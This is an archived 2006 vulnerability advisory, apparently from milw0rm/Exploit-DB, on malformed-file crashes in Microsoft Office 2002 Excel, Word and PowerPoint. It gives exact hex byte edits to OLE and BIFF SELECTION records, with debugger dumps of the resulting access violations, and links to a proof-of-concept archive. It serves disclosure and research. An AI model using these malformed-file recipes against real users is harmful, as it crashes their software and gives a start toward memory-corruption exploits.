284 lines
No EOL
9.6 KiB
Text
284 lines
No EOL
9.6 KiB
Text
# Full archive at https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1615.rar (excel_03262006.rar)
|
||
|
||
Topic : Microsoft Office 2002 - Excel/Powerpoint/Word.. 10.0.2614.0 => 11.0.5612.0
|
||
Date : 02/12/2006
|
||
Author : posidron <posidron@tripbit.net>
|
||
|
||
|
||
Table of Contens
|
||
================
|
||
- Some Excel Information
|
||
- The XLS File Format and Observation
|
||
- The XLW File Format and Observation
|
||
- Powerpoint and Word Dump Additions
|
||
- Conclusion
|
||
- References
|
||
|
||
|
||
Some Excel Information
|
||
======================
|
||
- Microsoft Excel uses the BIFF (Binary Interchange File Format)
|
||
- in Excel 8.0 (Excel 97), BIFF8 was introduced
|
||
- in Excel 10.0 (Excel XP), BIFF8X was introduced
|
||
- Excel 97 and Excel 2000 can read BIFF8X, except new features added with Excel XP.
|
||
|
||
Since BIFF5, all data is saved in OLE2 Storage Format/Structured Storage, which
|
||
can contain streams and storages.
|
||
|
||
|
||
A BIFF record is builded as follows:
|
||
|
||
Offset Size Contents
|
||
0 2 Identifier }
|
||
2 2 Size of the following data (sz) } Record header
|
||
4 sz Data
|
||
|
||
|
||
|
||
The XLS File Format
|
||
===================
|
||
If we open an Excel .xls workbook document with a hexeditor, we can see the
|
||
below block of records, which exists multiple times within an Excel document.
|
||
|
||
(Offsets are hexadecimal)
|
||
|
||
orig.xls
|
||
--------
|
||
Offset 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
|
||
00001200 FE FF 00 00 05 01 02 00 00 00 00 00 00 00 00 00 þÿ..............
|
||
00001210 00 00 00 00 00 00 00 00 01 00 00 00 E0 85 9F F2 ............à..ò
|
||
00001220 F9 4F 68 10 AB 91 08 00 2B 27 B3 D9 30 00 00 00 ùOh.«...+'³Ù0...
|
||
00001230 B0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 °...........@...
|
||
00001240 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 ....H.......`...
|
||
|
||
If we change the second line from
|
||
00001210 00 00 00 00 00 00 00 00 01 00 00 00 E0 85 9F F2 ............à..ò
|
||
to
|
||
00001210 00 00 00 00 00 00 00 00 FF FF FF FF E0 85 9F F2 ............à..ò
|
||
we get an 'Access Violation' in OLE32.DLL after opening the dcument in Excel.
|
||
|
||
(ole32.dll)
|
||
774D66B6 8B73 0C MOV ESI,DWORD PTR DS:[EBX+C]
|
||
774D66B9 8B4D 10 MOV ECX,DWORD PTR SS:[EBP+10]
|
||
774D66BC 8B7D 0C MOV EDI,DWORD PTR SS:[EBP+C]
|
||
774D66BF 03F0 ADD ESI,EAX
|
||
774D66C1 8BC1 MOV EAX,ECX
|
||
774D66C3 C1E9 02 SHR ECX,2
|
||
774D66C6 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] <==
|
||
|
||
ECX=00000369 (decimal 873.)
|
||
DS:[ESI]=[001B24F4]=00000000
|
||
ES:[EDI]=[00924000]=???
|
||
|
||
ESP ==> 0013786C 00923AE0
|
||
EBP-8 00137870 00923AE4
|
||
EBP-4 00137874 00923ADC
|
||
EBP ==> 00137878 /001378AC
|
||
EBP+4 0013787C |30C12D83 RETURN to mso.30C12D83
|
||
EBP+8 00137880 |001B32A8
|
||
EBP+C 00137884 |00923DC0
|
||
EBP+10 00137888 |00000FE4
|
||
|
||
EAX 00000FE4
|
||
ECX 00000369
|
||
EDX 00150608
|
||
EBX 001AE948
|
||
ESP 0013786C
|
||
EBP 00137878
|
||
ESI 001B24F4
|
||
EDI 00924000
|
||
EIP 774D66C6 OLE32.774D66C6
|
||
|
||
We found this block of records two times in an empty Excel document. I haven't
|
||
found an exact explanation about these records. It could be, that the record
|
||
FFFE defines the sheet range. More in the OpenOffice reference link on site 100.
|
||
|
||
|
||
|
||
|
||
The XLW File Format
|
||
===================
|
||
If we open an Excel .xlw Workbook document with a hexeditor, we can see the
|
||
below sequence of records, which exists multiple times within an Excel document.
|
||
|
||
(Offsets are hexadecimal)
|
||
|
||
orig.xlw
|
||
--------
|
||
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
|
||
00000110 38 00 04 00 01 00 10 00 3D 00 0A 00 68 01 87 00 8.......=...h...
|
||
00000120 8C 28 8D 18 04 00 3E 02 0A 00 B6 00 00 00 00 00 .(...>...¶.....
|
||
00000130 00 00 00 00 1D 00 0F 00 03 00 00 00 00 00 00 01 ................
|
||
00000140 00 00 00 00 00 00 00 0D 00 02 00 01 00 0C 00 02 ................
|
||
00000150 00 64 00 0F 00 02 00 01 00 11 00 02 00 00 00 10 .d..............
|
||
|
||
If we change the third and fourth line from
|
||
00000130 00 00 00 00 1D 00 0F 00 03 00 00 00 00 00 00 01 ................
|
||
00000140 00 00 00 00 00 00 00 0D 00 02 00 01 00 0C 00 02 ................
|
||
to
|
||
00000130 00 00 00 00 1D 00 0F 00 03 00 00 00 00 00 00 FF ................
|
||
00000140 FF FF FF 00 00 00 00 0D 00 02 00 01 00 0C 00 02 ................
|
||
we got an 'Access Violation' in excel.exe after opening the ducument in Excel.
|
||
|
||
|
||
Examine dump at offset: 00000110+8
|
||
|
||
WINDOW1 | 04 Bytes | 3D 00 0A 00
|
||
WINDOW1 | 10 Bytes | 68 01 87 00 8C 28 8D 18 04 00
|
||
WINDOW1 | 04 Bytes | 3E 02 0A 00
|
||
WINDOW2 | 10 Bytes | B6 00 00 00 00 00 00 00 00 00
|
||
SELECTION | 04 Bytes | 1D 00 0F 00
|
||
SELECTION | 15 Bytes | 03 00 00 00 00 00 00 01 00 00 00 00 00 00 00
|
||
|
||
About the SELECTION record (00 1D):
|
||
|
||
Offset Size Contents
|
||
0 1 Pane identifier
|
||
1 2 Index to row of the active cell
|
||
3 2 Index to column of the active cell
|
||
5 2 Index into the following cell range list
|
||
to the entry that contains the active cell
|
||
7 variable Cell range address list containing all selected
|
||
cell ranges. Column indexes are always 8-bit values.
|
||
|
||
This record contains the addresses of all selected cell ranges and the
|
||
position of the active cell for a pane in current sheet. It is part of
|
||
the "Sheet View Settings Block". There is one SELECTION record for each
|
||
pane in the sheet.
|
||
|
||
|
||
excel.exe
|
||
---------
|
||
30028546 C2 0800 RETN 8
|
||
30028549 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]
|
||
3002854D 8B15 484E7D30 MOV EDX,DWORD PTR DS:[307D4E48]
|
||
30028553 56 PUSH ESI
|
||
30028554 57 PUSH EDI
|
||
30028555 66:8B40 06 MOV AX,WORD PTR DS:[EAX+6] <==
|
||
30028559 8B7C24 10 MOV EDI,DWORD PTR SS:[ESP+10]
|
||
3002855D 25 FF0F0000 AND EAX,0FFF
|
||
30028562 8D0C40 LEA ECX,DWORD PTR DS:[EAX+EAX*2]
|
||
30028565 8B42 10 MOV EAX,DWORD PTR DS:[EDX+10]
|
||
30028568 8D34C8 LEA ESI,DWORD PTR DS:[EAX+ECX*8]
|
||
3002856B B9 05000000 MOV ECX,5
|
||
30028570 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
|
||
30028572 5F POP EDI
|
||
30028573 5E POP ESI
|
||
30028574 C2 0800 RETN 8
|
||
|
||
DS:[01642A72]=???
|
||
AX=2A6C
|
||
|
||
EAX 01642A6C
|
||
ECX 00000015
|
||
EDX 015C15DC
|
||
EBX 00000001
|
||
ESP 00136964
|
||
EBP 00136B00
|
||
ESI 00007979
|
||
EDI 00000000
|
||
EIP 30028555 EXCEL.30028555
|
||
|
||
ESP ==> 00136964 00000000
|
||
ESP+4 00136968 00007979
|
||
ESP+8 0013696C 30027795 RETURN to EXCEL.30027795 from EXCEL.30028549
|
||
ESP+C 00136970 01642A6C
|
||
ESP+10 00136974 001369A4
|
||
ESP+14 00136978 00000001
|
||
ESP+18 0013697C 00000000
|
||
ESP+1C 00136980 00000000
|
||
ESP+20 00136984 77D1BC7D USER32.GetWindow
|
||
ESP+24 00136988 00AB0208
|
||
ESP+28 0013698C 00000000
|
||
ESP+2C 00136990 7FFDF000
|
||
ESP+30 00136994 00000058
|
||
ESP+34 00136998 00000053
|
||
ESP+38 0013699C 0000059B
|
||
ESP+3C 001369A0 00000023
|
||
ESP+40 001369A4 001369CC
|
||
ESP+44 001369A8 77D4F160 RETURN to USER32.77D4F160 from USER32.77D318A2
|
||
ESP+48 001369AC 00040000
|
||
ESP+4C 001369B0 00000000
|
||
ESP+50 001369B4 77EF7AB2 RETURN to GDI32.77EF7AB2
|
||
|
||
|
||
In the SELECTION record, it's regardless which offset address we overwrite
|
||
to produce an exception. If we play with the values/offsets in the SELECTION
|
||
record, we get many different results.
|
||
|
||
|
||
Another example:
|
||
|
||
SELECTION | 04 Bytes | 1D 00 0F 00
|
||
SELECTION | 15 Bytes | 03 00 00 00 00 00 00 FF FF FF FF FF FF 00 00
|
||
|
||
|
||
(mso.dll)
|
||
30B1BCEA 66:8955 00 MOV WORD PTR SS:[EBP],DX
|
||
30B1BCEE 66:8975 02 MOV WORD PTR SS:[EBP+2],SI
|
||
30B1BCF2 66:892F MOV WORD PTR DS:[EDI],BP
|
||
30B1BCF5 66:897428 FE MOV WORD PTR DS:[EAX+EBP-2],SI <==
|
||
30B1BCFA 8B4424 18 MOV EAX,DWORD PTR SS:[ESP+18]
|
||
30B1BCFE 5B POP EBX
|
||
|
||
EAX 00006F24
|
||
ECX 00006000
|
||
EDX 00000DDC
|
||
EBX 000007ED
|
||
ESP 0013FCF4
|
||
EBP 015C0DE0
|
||
ESI 00006F24
|
||
EDI 015C0000
|
||
EIP 30B1BCF5 mso.30B1BCF5
|
||
|
||
SI=6F24
|
||
DS:[015C7D02]=???
|
||
|
||
ESP ==> 0013FCF4 00000000
|
||
ESP+4 0013FCF8 00000000
|
||
ESP+8 0013FCFC 30B1BBB0 mso.__MsoPvFree@8
|
||
|
||
|
||
|
||
For the completeness Powerpoint and Word which have the same structure as in
|
||
the .xls file format.
|
||
|
||
Microsoft Word
|
||
--------------
|
||
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
|
||
00002400 FE FF 00 00 05 01 02 00 00 00 00 00 00 00 00 00 þÿ..............
|
||
00002410 00 00 00 00 00 00 00 00 01 00 00 00 E0 85 9F F2 ............à..ò
|
||
00002420 F9 4F 68 10 AB 91 08 00 2B 27 B3 D9 30 00 00 00 ùOh.«...+'³Ù0...
|
||
to
|
||
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
|
||
00002400 FE FF 00 00 05 01 02 00 00 00 00 00 00 00 00 00 þÿ..............
|
||
00002410 00 00 00 00 00 00 00 00 FF FF FF FF E0 85 9F F2 ............à..ò
|
||
00002420 F9 4F 68 10 AB 91 08 00 2B 27 B3 D9 30 00 00 00 ùOh.«...+'³Ù0...
|
||
Results in an 'Access Violation'.
|
||
|
||
AppName: winword.exe AppVer: 10.0.2627.0 ModName: mso.dll
|
||
ModVer: 10.0.2625.0 Offset: 0001b411
|
||
|
||
|
||
Microsoft Powerpoint
|
||
--------------------
|
||
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
|
||
00001A00 FE FF 00 00 05 01 02 00 00 00 00 00 00 00 00 00 þÿ..............
|
||
00001A10 00 00 00 00 00 00 00 00 01 00 00 00 02 D5 CD D5 .............ÕÍÕ
|
||
00001A20 9C 2E 1B 10 93 97 08 00 2B 2C F9 AE 30 00 00 00 ........+,ù®0...
|
||
to
|
||
00001A00 FE FF 00 00 05 01 02 00 00 00 00 00 00 00 00 00 þÿ..............
|
||
00001A10 00 00 00 00 00 00 00 00 FF FF FF FF 02 D5 CD D5 .............ÕÍÕ
|
||
00001A20 9C 2E 1B 10 93 97 08 00 2B 2C F9 AE 30 00 00 00 ........+,ù®0...
|
||
Results in an 'Access Violation'.
|
||
|
||
AppName: powerpnt.exe AppVer: 10.0.2623.0 ModName: mso.dll
|
||
ModVer: 10.0.2625.0 Offset: 0011300d
|
||
|
||
|
||
|
||
References
|
||
----------
|
||
Excel File Format Structure (http://sc.openoffice.org/excelfileformat.pdf)
|
||
|
||
# milw0rm.com [2006-03-27] |